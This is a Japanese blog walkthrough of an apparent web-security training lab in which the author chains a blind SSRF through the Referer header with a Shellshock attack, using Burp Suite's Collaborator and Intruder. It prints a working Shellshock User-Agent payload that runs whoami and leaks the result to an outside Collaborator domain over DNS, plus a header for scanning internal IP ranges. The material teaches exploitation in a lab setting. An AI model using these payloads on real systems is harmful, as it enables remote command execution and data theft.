shikata ga nai

Private? There is no such things.

Blind SSRF with Shellshock exploitationをやってみた

Hello there, ('ω')ノ

 

Shellshockエクスプロイトを使用したブラインドSSRFを。

まずは、BApp StoreからCollaborator Everywhereという拡張機能をインストールして。

これは、Burp Collaboratorにピングバックを発生させて。

バックエンドシステムを明らかにするようで。

また、スコープ内のプロキシトラフィックを増強するようで。

 

f:id:ThisIsOne:20210216142040p:plain

 

インストールが確認できて。

 

f:id:ThisIsOne:20210216142101p:plain

 

ページでアクセスして。

 

f:id:ThisIsOne:20210216142225p:plain

 

Collaborator Everywhereがターゲットになるようにスコープの設定を。

 

f:id:ThisIsOne:20210216142333p:plain

 

商品を選択すると。

 

f:id:ThisIsOne:20210216142446p:plain

 

さっそく、Collaborator Everywhere関連の脆弱性が。

 

f:id:ThisIsOne:20210216142529p:plain

 

f:id:ThisIsOne:20210216142550p:plain

 

商品を選択したリクエストをIntruderへ。

 

f:id:ThisIsOne:20210216143150p:plain

 

さらにCollaborator clientも起動して。

 

f:id:ThisIsOne:20210216142942p:plain

 

HTTPインタラクションには、リクエスト内にUser-Agent文字列が含まれていて。

これがShellshock攻撃のペイロードとして使用される可能性があって。

なので、下記のように変更して。

最後にクリップボードにコピーしたCollaboratorドメインのShellshockペイロードを。

 

User-Agent:() { :; }; /usr/bin/nslookup $(whoami).o4twq1egfkpgdcoa1z6cxy3y7pdh16.burpcollaborator.net

 

リファラヘッダを変更して。

第4オクテットをピボットすることに 。

 

Referer: http://192.168.0.§1§:8080

 

f:id:ThisIsOne:20210216143755p:plain


可変させるIPアドレスの範囲をして。

 

f:id:ThisIsOne:20210216143448p:plain

 

Start attackして。

 

f:id:ThisIsOne:20210216143921p:plain

 

Poll nowをクリックすると。

Collaboratorでキャプチャされたすべてのインタラクションが表示されて。

これで、Blind SSRF攻撃に成功したバックエンドシステムによって。

開始されたDNS相互作用が表示されて。

OSユーザの名前は、DNSサブドメイン内に表示されて。

 

f:id:ThisIsOne:20210216143945p:plain

 

下記のOSユーザ名前を入力すると。

 peter-xMdXOi

 

f:id:ThisIsOne:20210216144058p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210216144119p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain